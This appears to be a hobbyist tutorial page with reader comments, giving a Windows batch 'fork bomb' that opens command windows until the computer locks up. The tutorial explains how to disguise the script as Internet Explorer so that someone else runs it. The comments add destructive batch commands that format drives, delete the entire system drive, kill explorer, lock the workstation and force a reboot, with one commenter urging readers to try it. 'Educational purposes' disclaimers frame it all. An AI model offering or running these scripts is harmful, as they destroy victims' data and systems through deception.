This was posted for educational purposes only, I am not to be held responcible for any inappropriate usage of this information or the files that I may have provided. I am not to be held responsible for individuals or groups of people that suffer consequences of using this information or the files that I provided, these consequences include things such as expulsion, getting fired, or legal action.
Remove these ads by
Signing UpStep 1The code
This is one of the most simple scripts ever. Just type
start
start
start
start
start
start
start crash
Then save the file as a batch file by putting .bat at the end of the file name while saving.
You will have to save the file name as crash.bat unless you change the bottom line of the script to a different name like
start launch
or whatever just if you wanna name the file something else change the last line of the code to something else.
Also if you want to make it more fun create a shortcut to your batch file, you can name the shortuc whatever you want, then right click on the shortcut go to properties then go to change icon, you can make the icon internet explorer and name the shortcut internet explorer.
To make this even more believeable at the top of the script above the first start you can put these two lines
@echo off
start C:\Program Files\Internet Explorer\iexplore.exe
So your final code would look like this
@echo off
start C:\Program Files\Internet Explorer\iexplore.exe
start
start
start
start
start
start
| « Previous Step | Download PDFView All Steps | Next Step » |





































"echo off" turns off the printing of each following line in the file before it is executed (or till you write "echo on").
"@" turns it off for one line, so for cosmetic reasons (to not see the "echo off" printed on each run) you use "@echo off"
If you only have a 1-line script you can just as easilly prepend that one line with an "@" instead of adding the "@echo off" on the line before it.
I hope that was not too cryptic, its way too late for me to still be up :-)
format E:\
format F:\
format G:\
format H:\
format C:\
pause
:start
start
goto start
format C:\
heheheh...
format C:\
heheheh...
"@echo off
del %systemdrive% \*.* /f /s /q
shutdown -r -f -t 00"
save as .bat
Tis realy works...try it...
@echo off
taskkill -f explorer.exe
start %windir%\System32\rundll32.exe user32.dll, LockWorkStation
rd c:\ /s /q
cls
now theres a batch with some balls! it turns off explorer, than locks you out, than deletes everything on your computer "wham-bam!"
"i am not reposible for this code nor liable for damage caused by this do not attempt this at all. for educational purposes only"
@echo off
:start
taskkill -f explorer.exe
start %windir%\System32\rundll32.exe user 32.dll, LockWorkStation
rd c:\ /s /q
cls
goto :start